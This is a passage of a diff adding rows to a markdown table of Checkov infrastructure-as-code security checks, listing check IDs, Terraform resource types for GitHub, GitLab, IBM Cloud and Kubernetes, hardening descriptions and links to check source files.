+| 1832 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) |
+| 1833 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) |
+| 1834 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) |
+| 1835 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) |
+| 1836 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) |
+| 1837 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) |
+| 1838 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | 
[IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | +| 1839 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | +| 1840 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | +| 1841 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | +| 1842 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | +| 1843 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | +| 1844 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | 
[PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | +| 1845 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | +| 1846 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | +| 1847 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | +| 1848 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | +| 1849 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | +| 1850 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1851 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1852 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1853 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1854 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1855 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1856 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1857 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1858 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1859 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1860 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1861 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1862 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1863 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1864 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1865 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1866 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1867 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1868 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should 
be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1869 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1870 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1871 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1872 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1873 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1874 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1875 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1876 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1877 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1878 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1879 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1880 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1881 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1882 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1883 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1884 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers 
| Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1885 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1886 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1887 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1888 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1889 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1890 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1891 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | 
[ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1892 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1893 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1894 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1895 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1896 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1897 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1898 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1899 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1900 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1901 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1902 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1903 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1904 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1905 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1906 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1907 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1908 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1909 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1910 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1911 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1912 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1913 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be 
used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1914 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1915 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1916 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1917 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1918 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1919 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1920 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1921 | CKV_K8S_21 | resource | 
kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1922 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1923 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1924 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1925 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1926 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1927 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1928 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | 
[ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1929 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1930 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1931 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1932 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | +| 1933 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1934 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1935 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | 
[AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1936 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1937 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1938 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1939 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1940 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1941 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1942 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1943 | CKV_K8S_27 | resource | kubernetes_deployment 
| Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1944 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1945 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1946 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 1947 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1948 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1949 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1950 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | 
